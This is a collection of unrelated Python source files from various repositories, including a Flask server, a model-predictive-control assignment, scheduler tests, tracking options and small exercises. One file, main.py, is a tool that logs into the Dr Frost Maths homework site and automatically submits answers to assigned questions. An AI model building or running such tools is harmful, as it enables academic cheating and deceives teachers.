AgentCategory("seller", sellers), # AgentCategory("buyer", buyers), # ]) # print(budget_balanced_trade_reduction(market, recipe)) # # # print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: mediators-buyers-sellers") # market = Market([ # AgentCategory("mediator", mediators), # AgentCategory("buyer", buyers), # AgentCategory("seller", sellers), # ]) # print(budget_balanced_trade_reduction(market, recipe)) # # # #
4,489
sandbox/lib/jumpscale/JumpscaleLibsExtra/servers/grid_capacity/server/app.py
threefoldtech/threebot_prebuilt
2
2170611
import os import sys import datetime from flask import Flask, jsonify from Jumpscale import j from . import settings from .flask_itsyouonline import configure from .models import db app = Flask(__name__) app.secret_key = os.urandom(24) configure( app, settings.IYO_CLIENTID, settings.IYO_SECRET, settings.IYO_CALLBACK, "/callback", None, True, True, "organization", ) # connect to mongodb j.clients.mongoengine.get("capacity", interactive=False) db.init_app(app) from .api_api import api_api from .frontend_blueprint import frontend_bp app.register_blueprint(api_api) app.register_blueprint(frontend_bp) @app.template_filter() def uptime(seconds): if not seconds: return "not available" delta = datetime.timedelta(seconds=seconds) # manually compute hh:mm:ss hrs = int(delta.seconds / 3600) min = int((delta.seconds - (hrs * 3600)) / 60) sec = delta.seconds % 60 if delta.days > 0: return "%d days, %02d:%02d:%02d" % (delta.days, hrs, min, sec) return "%02d:%02d:%02d" % (hrs, min, sec) @app.template_filter() def deltatime_color(time): """ return a color base on the delta time between now and time :param time: time we when to compare :type time: datetime.datetime :return: color :rtype: str """ if not time: return "danger" delta = (datetime.datetime.now() - time).total_seconds() if delta <= 600: # 10 minutes or less return "success" if 600 < delta and delta < 900: # between 10 and 15 minutes return "warning" if delta > 900: # plus de 15 minutes return "danger" @app.template_filter() def node_status(time): """ return a color base on the delta time between now and time :param time: time we when to compare :type time: datetime.datetime :return: color :rtype: str """ if not time: return "down" delta = (datetime.datetime.now() - time).total_seconds() if delta <= 600: # 10 minutes or less return "up" if 600 < delta and delta < 900: # between 10 and 15 minutes return "likely down" if delta > 900: # plus de 15 minutes return "down" @app.errorhandler(500) def internal_error(err): _, _, exc_traceback = sys.exc_info() eco = j.core.errorhandler.parsePythonExceptionObject(err, tb=exc_traceback) return jsonify(code=500, message=eco.errormessage, stack_trace=eco.traceback), 500 if __name__ == "__main__": app.run(debug=True, port=settings.PORT, host=settings.PORT)
2,564
assignment3.py
racarla96/mpc-course-assignments
0
2170447
import numpy as np from sim.sim2d import sim_run # Simulator options. options = {} options['FIG_SIZE'] = [8,8] options['OBSTACLES'] = True class ModelPredictiveControl: def __init__(self): self.horizon = 15 self.dt = 0.2 # Reference or set point the controller will achieve. self.reference1 = [10, 0, 0] self.reference2 = None self.x_obs = 5 self.y_obs = 0.1 def plant_model(self,prev_state, dt, pedal, steering): x_t = prev_state[0] y_t = prev_state[1] psi_t = prev_state[2] v_t = prev_state[3] a_t = pedal x_t = x_t + np.cos(psi_t) * v_t * dt y_t = y_t + np.sin(psi_t) * v_t * dt v_t = v_t + a_t * dt - v_t/25 psi_t = psi_t + v_t * (np.tan(steering)/2.5) * dt return [x_t, y_t, psi_t, v_t] def cost_function(self,u, *args): state = args[0] ref = args[1] cost = 0.0 car_width = 1.0 car_height = 2.5 car_radius = 2.5 object_radius = 0.5 for i in range(0, self.horizon): state = self.plant_model(state, self.dt, u[i*2], u[i*2+1]) # Distance cost distance_cost = np.sqrt( ((ref[0] - state[0]) ** 2) + ((ref[1] - state[1]) ** 2) ) # Angle cost angle_cost = 0 if distance_cost < 4: angle_cost = (ref[2] - state[2]) ** 2 # Object cost obj_distance = (np.sqrt(((self.x_obs - state[0]) ** 2) + ((self.y_obs - state[1]) ** 2))) obj_cost = 0 if obj_distance < 1.5: obj_cost = 1000/obj_distance cost += distance_cost + obj_cost + angle_cost return cost sim_run(options, ModelPredictiveControl)
1,784
treillage/__init__.py
hanztura/Treillage
1
2169718
from ._version import get_versions from .treillage import Treillage from .treillage import BaseURL from .exceptions import * from .credential import Credential from .ratelimiter import RateLimiter from .token_manager import TokenManager from .connection_manager import ConnectionManager from .connection_manager import retry_on_rate_limit __version__ = get_versions()['version'] del get_versions
397
tests/test_lr_schedulers.py
igormq/speech2text
11
2170802
import pytest from asr import lr_schedulers import torch import logging @pytest.mark.parametrize( 'name, klass', [("step", torch.optim.lr_scheduler.StepLR), ("multi_step", torch.optim.lr_scheduler.MultiStepLR), ("exponential", torch.optim.lr_scheduler.ExponentialLR), ("reduce_on_plateau", torch.optim.lr_scheduler.ReduceLROnPlateau), ("cosine", torch.optim.lr_scheduler.CosineAnnealingLR), ("cyclic", torch.optim.lr_scheduler.CyclicLR)]) def test_by_name(name, klass): k = lr_schedulers.by_name(name) assert k == klass def test_by_name(): with pytest.raises(ValueError): lr_schedulers.by_name('invalid-name') def test_from_params(): params = [torch.rand(1).requires_grad_()] optimizer = torch.optim.SGD(params, 0.1) params = 'step' with pytest.raises(TypeError) as excinfo: lr_scheduler = lr_schedulers.from_params(params) isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR) assert "missing 1 required positional argument: 'optimizer'" in str( excinfo.value) with pytest.raises(TypeError) as excinfo: lr_scheduler = lr_schedulers.from_params(params, optimizer) assert "missing 1 required positional argument: 'step_size'" in str( excinfo.value) lr_scheduler = lr_schedulers.from_params(params, optimizer, step_size=1) isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR) params = {'type': 'step'} lr_scheduler = lr_schedulers.from_params(params, optimizer, step_size=1) assert isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR) params = {'type': 'step', 'step_size': 1} lr_scheduler = lr_schedulers.from_params(params, optimizer) assert isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR) assert lr_scheduler.step_size == 1 params = {'type': 'step', 'step_size': 1} lr_scheduler = lr_schedulers.from_params(params, optimizer, step_size=2) assert isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR) assert lr_scheduler.step_size == 2 def test_logging(caplog): params = {'type': 'step', 'step_size': 1} optimizer = torch.optim.SGD([torch.rand(1).requires_grad_()], 0.1) lr_scheduler = lr_schedulers.from_params(params, optimizer, step_size=2) assert "Instantiating class `torch.optim.lr_scheduler.StepLR` with params {'step_size': 2}" in caplog.record_tuples[ 0][2] assert logging.INFO == caplog.record_tuples[0][1]
2,464
Sources/HTTPGetImage.py
hatjs880328s/AutoBuildIOSProject
2
2170424
#!/usr/bin/env python # -*- coding:UTF-8 -*- import urllib2 import time import json import os from IILog import * ''' First get All pic's url Second download all of them Third save in directly folder #reference:::: <download pics>https://blog.csdn.net/j_c_weaton/article/details/53895149 <read api >https://blog.csdn.net/sunshinelyc/article/details/52755044 ''' IILog().successPrint('####### Start - HTTPGetImageModule---') # get net work pic url def loadALLPicsURL(url): picDic = {} # YSJ PIC picDefaulturl = 'http://i2.bvimg.com/642337/51d104edb0802d52.png' # CLOUD PIC picLandurl = 'http://i2.bvimg.com/642337/cd1c6c175210b5aa.png' response = urllib2.urlopen(url) jsondata = json.loads(response.read()) for eachItem in jsondata['result']: picDic[eachItem['id']] = picDefaulturl return picDic # the api url is to get Some pics def getAPIUrl(): apiUrl = '' fileHandle = open('sourcePathsourceipaName.txt', 'r') for eachItem in fileHandle.readlines(): if eachItem.__contains__('ApiRefurls'): apiUrl = eachItem[13:].strip('\n') break else: continue print('### The pics url is: ' + apiUrl) fileHandle.close() return apiUrl # local pic path def getLocalPicPath(): logoPath = '' fileHandle = open('sourcePathsourceipaName.txt', 'r') for eachItem in fileHandle.readlines(): if eachItem.__contains__('LogoRepath'): logoPath = eachItem[13:].strip('\n') break else: continue fileHandle.close() print('### The Local logo path is: ' + logoPath) return logoPath + '/' ''' GET URL THAT IT CAN GET PICS - apiUrl GET ALL PICS URL LIST<STRING> - picUrls ''' # pic api address apiUrl = getAPIUrl() # pic url dic <string,string> picUrls = loadALLPicsURL(apiUrl) # local logo path localLogopath = getLocalPicPath() IILog().successPrint('### Get all pic url & names ok...\n') ''' GET PIC DATA WITH PICURL GO- ''' # get net pic & write to directly file def getImageData(picName,picUrl): binary_data = urllib2.urlopen(picUrl).read() temp_file = open(picName, 'wb') temp_file.write(binary_data) temp_file.close() # loop in - get all local logo path & use getImageData() function change it's data def runloopChangePic(): # for picValue in picDir.keys(): path = localLogopath for file in os.listdir(path): if file.__contains__('.png'): print('### Change pic ' + file + ' data start...') getImageData(path + file, picUrls.values()[0]) IILog().successPrint('### Change pic ' + file + ' data end...\n') ''' START-CHANGE LOGO DATA ''' runloopChangePic() IILog().successPrint('### Pics Change ok.')
2,805
prog_python/tuplas/swap.py
TCGamer123/python
1
2167776
x = 10; y = 20; #Swap tradicional print("x e y antes do swap: ", x, y); temp = x; x = y; y = temp; print("x e y depois do swap: ", x, y); print(); x = 10; y = 20; # Swap com tuplas print("x e y antes do swap: ", x,y); x, y = y,x; print("x e y depois do swap: ", x,y);
275
Ago-Dic-2019/IvanMedina/pythonCrash/summingAMillon.py
Arbupa/DAS_Sistemas
41
2169947
''' <NAME> 4.5 ''' from countingToTwenty import makeList from countingToTwenty import printList if __name__ == "__main__": list=makeList(1000000) print("[ MIN ] : {}".format(min(list))) print("[ MAX ] : {}".format(max(list))) print("[ SUM ] : {}".format(sum(list)))
285
main.py
AsadKhan163631/DFM-Answer-Tool
2
2168815
import json import tkinter.messagebox as tm import traceback from tkinter import * from requests import Session from answer_handler import AnswerHandler class InvalidLoginDetails(Exception): pass class LoginFrame(Frame): def __init__(self, master): super().__init__(master) self.label_username = Label(self, text="Email") self.label_password = Label(self, text="Password") self.entry_username = Entry(self) self.entry_password = Entry(self, show="*") self.label_username.grid(row=0, sticky=E) self.label_password.grid(row=1, sticky=E) self.entry_username.grid(row=0, column=1) self.entry_password.grid(row=1, column=1) self.log_btn = Button(self, text="Login", command=self._login_btn_clicked) self.log_btn.grid(columnspan=2) self.pack() def _login_btn_clicked(self): email = self.entry_username.get() password = self.entry_password.get() if '@' not in email: email += '@kedst.ac.uk' try: Interface(email, password) except InvalidLoginDetails as e: print(e, file=sys.stderr) tm.showerror("Login error", "Incorrect Email or Password") class Interface: """ main interface between user and script """ def __init__(self, email, password): self.session = Session() self.test_login(email, password) self.handler = AnswerHandler(self.session) root.destroy() # destroy login menu self.print_init() self.print_instructions() self.main_loop() def main_loop(self): """ main interface loop will only exit if ctl-c is pressed """ print('Press ctrl-c to quit') while True: url = input('\nType Question url: ') handler = AnswerHandler(self.session) res, err = handler.answer_questions(url) if res: print('No more questions for this URL') else: print(f'Unexpected exception occurred: {err}', file=sys.stderr) traceback.print_exc() def test_login(self, email, password): login_url = 'https://www.drfrostmaths.com/process-login.php?url=' headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)' ' Chrome/71.0.3578.98 Safari/537.36'} data = {'login-email': email, 'login-password': password} self.session.post(login_url, headers=headers, data=data) try: """ verifying user is authenticated by tests if user can load the times tables """ res = self.session.get('https://www.drfrostmaths.com/homework/process-starttimestables.php') json.loads(res.text) except BaseException: raise InvalidLoginDetails(f'Email: {email}, Password: {"*" * len(password)}') @staticmethod def print_init(): print_string = '---- Dr Frost Answer Tool v3 ----\n' \ '---- Author: AK163631 ----\n' \ '*** Warning: this script has not been properly tested so might unexpectedly break ***\n' \ 'Source: https://github.com/AK163631/DFM-Answer-Tool\n' \ 'The author does not assume any liability for the use or abuse of this program!\n' \ 'This tool is intended to be used to check answers\n' \ 'Although it submit most answer types for you\n' \ 'Release notes:\n' \ ' - Fixed and optimised parser' print(print_string) @staticmethod def print_instructions(): print_string = "\nstep1 - Login to dfm on both the tool and web browser\n" \ "step2 - Navigate to a set of assessment questions on dfm usually set by a teacher\n" \ "Note: you can also use the tool for practice questions aswell\n" \ "step3 - When you start the questions you will be given a URL that look something like this:\n" \ "http://www.drfrostmaths.com/homework/do-question.php?aaid=590397\n" \ "OR like this:\n" \ "http://www.drfrostmaths.com/homework/do-question.php?aaid=590399&qnum=4\n" \ "Note: It does not make a difference if you are in the middle of a set questions or at the " \ "start, the program will answer remaining questions\n" \ "step5 - Copy the URL and paste it into the tool then press enter," \ "step6 - The tool will find the answer all remaining questions\n" \ "Note: If completing practice questions the tool will submit answers indefinitely\n" \ "Note: Rarely the tool may come across an unknown answer type which it is unable to handle." \ "The tool will print this answer to the screen and you will need to input it manually" choice = input('Do you wish to read the guide on how to use the tool? (y/n): ') if choice == 'y': print(print_string) if __name__ == "__main__": root = Tk() root.protocol('WM_DELETE_WINDOW', sys.exit) root.geometry('300x80') root.title('DFM Login Screen') lf = LoginFrame(root) # wait for login to be retrieved root.mainloop()
5,541
examples/Python/shapedetail.py
var414n/ubigraph_server
4
2170857
import xmlrpclib # Create an object to represent our server. server_url = 'http://127.0.0.1:20738/RPC2'; server = xmlrpclib.Server(server_url); G = server.ubigraph G.clear() x = G.new_vertex() y = G.new_vertex() z = G.new_vertex() G.new_edge(x,y) G.new_edge(y,z) G.set_vertex_attribute(x, "shape", "sphere"); G.set_vertex_attribute(x, "shapedetail", "40"); G.set_vertex_attribute(x, "label", "shapedetail=40"); G.set_vertex_attribute(y, "shape", "sphere"); G.set_vertex_attribute(y, "shapedetail", "10"); G.set_vertex_attribute(y, "label", "shapedetail=10"); G.set_vertex_attribute(z, "shape", "sphere"); G.set_vertex_attribute(z, "shapedetail", "5"); G.set_vertex_attribute(z, "label", "shapedetail=5");
709
Projects/Online Workouts/w3resource/String/program-75.py
ivenpoker/Python-Projects
1
2170757
#!/usr/bin/env python 3 ############################################################################################ # # # Program purpose: Find the smallest window that contains all characters of a given # # string. # # Program Author : <NAME> <<EMAIL>> # # Creation Date : November 5, 2019 # # # ############################################################################################ from collections import defaultdict def obtain_user_data(input_mess: str) -> str: is_valid, user_data = False, '' while is_valid is False: try: user_data = input(input_mess) if len(user_data) == 0: raise ValueError('Oops! Data needed') is_valid = True except ValueError as ve: print(f'[ERROR]: {ve}') return user_data def find_sub_string(some_str: str) -> str: str_len = len(some_str) # Count all distinct characters dist_count_char = len(set([x for x in some_str])) ctr, start_pos, start_pos_index, min_len = 0, 0, -1, 9999999999 curr_count = defaultdict(lambda: 0) for i in range(str_len): curr_count[some_str[i]] += 1 if curr_count[some_str[i]] == 1: ctr += 1 if ctr == dist_count_char: while curr_count[some_str[start_pos]] > 1: if curr_count[some_str[start_pos]] > 1: curr_count[some_str[start_pos]] -= 1 start_pos += 1 len_window = i - start_pos + 1 if min_len > len_window: min_len = len_window start_pos_index = start_pos return some_str[start_pos_index: start_pos_index + min_len] if __name__ == "__main__": main_data = obtain_user_data(input_mess='Enter some string data: ') print(f'Smallest window that contains all characters of the said string: {find_sub_string(some_str=main_data)}')
2,239
scripts/split-dataset.py
vr100/rl-trading
0
2170544
import argparse, os from utils import dataset def parse_args(): parser = argparse.ArgumentParser() parser.add_argument( "--data_path", type=str, help="specifies the train csv data file path", required=True) parser.add_argument( "--output_path", type=str, help="specifies the output folder path", required=True) parser.add_argument( "--time_sensitive", default=False, type=lambda s: s.lower() in ['true', 'yes', '1'], help="specifies whether the test data should be after train data") return vars(parser.parse_args()) def main(): args = parse_args() print("Args: {}".format(args)) data_path = os.path.abspath(args["data_path"]) output_path = os.path.abspath(args["output_path"]) time_sensitive = args["time_sensitive"] dataset.split_data(data_path, output_path, time_sensitive) main()
812
logs_pack/logs.py
Saldenisov/QY_itegrating_sphere
0
2169048
import logging import os.path def initialize_logger(output_dir, name=None): logger = logging.getLogger(name) logger.setLevel(logging.DEBUG) # create console handler and set level to info handler = logging.StreamHandler() handler.setLevel(logging.INFO) formatter = logging.Formatter( "%(asctime)s - %(name)s - %(levelname)s - %(message)s") handler.setFormatter(formatter) logger.addHandler(handler) # create error file handler and set level to error handler = logging.FileHandler(os.path.join( output_dir, "error.log"), "w", encoding=None, delay="true") handler.setLevel(logging.ERROR) formatter = logging.Formatter( "%(asctime)s - %(name)s - %(levelname)s - %(message)s") handler.setFormatter(formatter) logger.addHandler(handler) # create debug file handler and set level to debug handler = logging.FileHandler(os.path.join(output_dir, "all.log"), "w") handler.setLevel(logging.DEBUG) formatter = logging.Formatter( "%(asctime)s - %(name)s - %(levelname)s - %(message)s") handler.setFormatter(formatter) logger.addHandler(handler) return logger
1,167
program.py
PiggyAwesome/Collatz-Conjecture
3
2170837
import time import webbrowser i = int(input("Input number: ")) typee = "bar" resulty = [] result = i + 0 while result != 1: if (result % 2) != 0: result = (result * 3) + 1 else: result = result / 2 print(int(result)) resulty.append(result) r = [] for i in range(len(resulty)): r.append('%20') webbrowser.open("https://quickchart.io/chart?title=3N%2B1&c={type:" + f'"{typee}"' + ",data:{labels:" + f"{r}" +" , datasets:[{label:'3N%2B1',data:" + f"{resulty}" + "}]}}") # Also makes a nice chart.
535
Problems/6. Procedures and Functions/5.Output_hello_and_world.py
wilpola/Introduction-to-programming_Python3
0
2170748
# @author: <NAME> # @date: 2021-10-29 # Score: 10/10 2nd try import random def print_hello(): print("Hello") def print_world(): print("World") for i in range(0,10): if random.randint(0,1) == 0: print_hello() else: print_world() # saying that there needs to be a new line char is misleading
315
zemberek/tokenization/span.py
Loodos/zemberek-python
52
2170880
class Span: r""" A class that represents specified chunks of a string. It is used to divide TurkishSentenceExtractor input paragraphs into smaller pieces from which the features will be extracted. """ def __init__(self, start: int, end: int): if start >= 0 and end >= 0: if end < start: raise Exception("Span end value can not be smaller than start value") else: self.start = start self.end = end else: raise Exception("Span start and end values can not be negative") def get_length(self) -> int: return self.end - self.start def middle_value(self) -> int: # THIS METHOD IS WRONG, CHECK THE USAGE return self.end + (self.end - self.start) // 2 def get_sub_string(self, string: str) -> str: return string[self.start:self.end] def in_span(self, i: int) -> bool: return self.start <= i < self.end def copy(self, offset: int) -> 'Span': return Span(offset + self.start, offset + self.end)
1,094
lib/piservices/remote/base.py
creative-workflow/pi-setup
1
2170560
from StringIO import StringIO import color class AbstractRemoteLoader: def __init__(self, service, remote_file = None): self.service = service self.remote_file = remote_file self.content = '' self.fd = None def load(self, remote_file = None): if remote_file: self.remote_file = remote_file try: with self.service.api.hide('output','running'): self.service.run('sudo mkdir -p $(dirname %(f)s) && sudo touch %(f)s' % {'f': self.remote_file}) self.content = self.service.run('sudo cat %s' % self.remote_file) except: pass #no problem ...file doesnt exist, we will create self.fd = StringIO(self.content) self.fd.seek(0) def prepare_content_for_write(self): pass def write(self, remote_file=None, content=None, resulting_user='root', resulting_group='root'): if not remote_file: remote_file = self.remote_file if not remote_file: remote_file = '' if content: self.content = content self.backup_if_no_backup_exists(remote_file) self.prepare_content_for_write() with color.for_put(): print "\n>> writing config: "+remote_file+"\n"+('='*30)+"\n"+self.content+"\n\n" fd = StringIO(self.content) fd.seek(0) fd.write(self.content+'\n') fd.seek(0) self.service.run('sudo mkdir -p $(dirname %(f)s) && sudo touch %(f)s && sudo truncate -s 0 %(f)s' % {'f': remote_file}) self.service.put(fd, remote_file, use_sudo=True) self.service.sudo('chown %s:%s %s' % (resulting_user, resulting_group, remote_file)) def backup_if_no_backup_exists(self, remote_file): i = remote_file o = '%s.pisetup.bak' % i if self.service.file_exists(i) and not self.service.file_exists(o): self.service.cp(i, o)
1,781
old/dccdc/loss.py
DotStarMoney/NBD
1
2170375
"""Loss/constraint functions.""" import tensorflow as tf def affinity_log_loss(y_true_affinity, y_pred_affinity_logits, weights): log_loss = tf.nn.sigmoid_cross_entropy_with_logits(y_true_affinity, y_pred_affinity_logits) avg_position_log_loss = tf.reduce_mean(log_loss, axis=-1) example_loss = tf.reduce_sum(weights * avg_position_log_loss, axis=-1) return tf.reduce_mean(example_loss)
451
dj-scm/cpx_sandbox.py
drpjm/gettin-crafty
0
2170202
import time from adafruit_circuitplayground.express import cpx import simpleio cpx.pixels.brightness = 0.2 while True: if cpx.switch: print("Slide switch off.") cpx.pixels.fill((10,10,10)) if cpx.button_a: cpx.play_tone(262,1) if cpx.button_b: cpx.play_tone(294,1) print("light level = ", cpx.light) continue else: R = 0 G = 0 B = 0 x,y,z = cpx.acceleration print((int(x),int(y),int(z))) if x: R = R + abs(int(x)) if y: G = G + abs(int(y)) if z: B = B + abs(int(z)) cpx.pixels.fill((R,G,B)) time.sleep(0.1)
708
utils_cv/tracking/opts.py
muminkoykiran/computervision-recipes
7,899
2169058
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. import argparse import os import os.path as osp class opts(object): """ Defines options for experiment settings, system settings, logging, model params, input config, training config, testing config, and tracking params. """ def __init__( self, load_model: str = "", gpus=[0, 1], save_all: bool = False, arch: str = "dla_34", head_conv: int = -1, input_h: int = -1, input_w: int = -1, lr: float = 1e-4, lr_step=[20, 27], num_epochs: int = 30, num_iters: int = -1, val_intervals: int = 5, conf_thres: float = 0.6, det_thres: float = 0.3, nms_thres: float = 0.4, track_buffer: int = 30, min_box_area: float = 200, reid_dim: int = 512, root_dir: str = os.getcwd(), ) -> None: # Set defaults for parameters which are less important self.task = "mot" self.dataset = "jde" self.resume = False self.exp_id = "default" self.test = False self.num_workers = 8 self.not_cuda_benchmark = False self.seed = 317 self.print_iter = 0 self.hide_data_time = False self.metric = "loss" self.vis_thresh = 0.5 self.pad = 31 self.num_stacks = 1 self.down_ratio = 4 self.input_res = -1 self.num_iters = -1 self.trainval = False self.K = 128 self.not_prefetch_test = True self.keep_res = False self.fix_res = not self.keep_res self.test_mot16 = False self.val_mot15 = False self.test_mot15 = False self.val_mot16 = False self.test_mot16 = False self.val_mot17 = False self.val_mot20 = False self.test_mot20 = False self.input_video = "" self.output_format = "video" self.output_root = "" self.data_cfg = "" self.data_dir = "" self.mse_loss = False self.hm_gauss = 8 self.reg_loss = "l1" self.hm_weight = 1 self.off_weight = 1 self.wh_weight = 0.1 self.id_loss = "ce" self.id_weight = 1 self.norm_wh = False self.dense_wh = False self.cat_spec_wh = False self.not_reg_offset = False self.reg_offset = not self.not_reg_offset # Set/overwrite defaults for parameters which are more important self.load_model = load_model self.gpus = gpus self.save_all = save_all self.arch = arch self.set_head_conv(head_conv) self.input_h = input_h self.input_w = input_w self.lr = lr self.lr_step = lr_step self.num_epochs = num_epochs self.val_intervals = val_intervals self.conf_thres = conf_thres self.det_thres = det_thres self.nms_thres = nms_thres self.track_buffer = track_buffer self.min_box_area = min_box_area self.reid_dim = reid_dim # init self._init_root_dir(root_dir) self._init_batch_sizes(batch_size=12, master_batch_size=-1) self._init_dataset_info() def _init_root_dir(self, value): self.root_dir = value self.exp_dir = osp.join(self.root_dir, "exp", self.task) self.save_dir = osp.join(self.exp_dir, self.exp_id) self.debug_dir = osp.join(self.save_dir, "debug") def _init_batch_sizes(self, batch_size, master_batch_size) -> None: self.batch_size = batch_size self.master_batch_size = ( master_batch_size if master_batch_size != -1 else self.batch_size // len(self.gpus) ) rest_batch_size = self.batch_size - self.master_batch_size self.chunk_sizes = [self.master_batch_size] for i in range(len(self.gpus) - 1): chunk = rest_batch_size // (len(self.gpus) - 1) if i < rest_batch_size % (len(self.gpus) - 1): chunk += 1 self.chunk_sizes.append(chunk) def _init_dataset_info(self) -> None: default_dataset_info = { "mot": { "default_resolution": [608, 1088], "num_classes": 1, "mean": [0.408, 0.447, 0.470], "std": [0.289, 0.274, 0.278], "dataset": "jde", "nID": 14455, } } class Struct: def __init__(self, entries): for k, v in entries.items(): self.__setattr__(k, v) dataset = Struct(default_dataset_info[self.task]) self.dataset = dataset.dataset self.update_dataset_info_and_set_heads(dataset) def update_dataset_res(self, input_h, input_w) -> None: self.input_h = input_h self.input_w = input_w self.output_h = self.input_h // self.down_ratio self.output_w = self.input_w // self.down_ratio self.input_res = max(self.input_h, self.input_w) self.output_res = max(self.output_h, self.output_w) def update_dataset_info_and_set_heads(self, dataset) -> None: input_h, input_w = dataset.default_resolution self.mean, self.std = dataset.mean, dataset.std self.num_classes = dataset.num_classes # input_h(w): input_h overrides input_res overrides dataset default input_h = self.input_res if self.input_res > 0 else input_h input_w = self.input_res if self.input_res > 0 else input_w self.input_h = self.input_h if self.input_h > 0 else input_h self.input_w = self.input_w if self.input_w > 0 else input_w self.output_h = self.input_h // self.down_ratio self.output_w = self.input_w // self.down_ratio self.input_res = max(self.input_h, self.input_w) self.output_res = max(self.output_h, self.output_w) if self.task == "mot": self.heads = { "hm": self.num_classes, "wh": 2 if not self.cat_spec_wh else 2 * self.num_classes, "id": self.reid_dim, } if self.reg_offset: self.heads.update({"reg": 2}) self.nID = dataset.nID self.img_size = (self.input_w, self.input_h) else: assert 0, "task not defined" def set_gpus(self, value): gpus_list = [int(gpu) for gpu in value.split(",")] self.gpus = ( [i for i in range(len(gpus_list))] if gpus_list[0] >= 0 else [-1] ) self.gpus_str = value def set_head_conv(self, value): h = value if value != -1 else 256 self.head_conv = h
6,769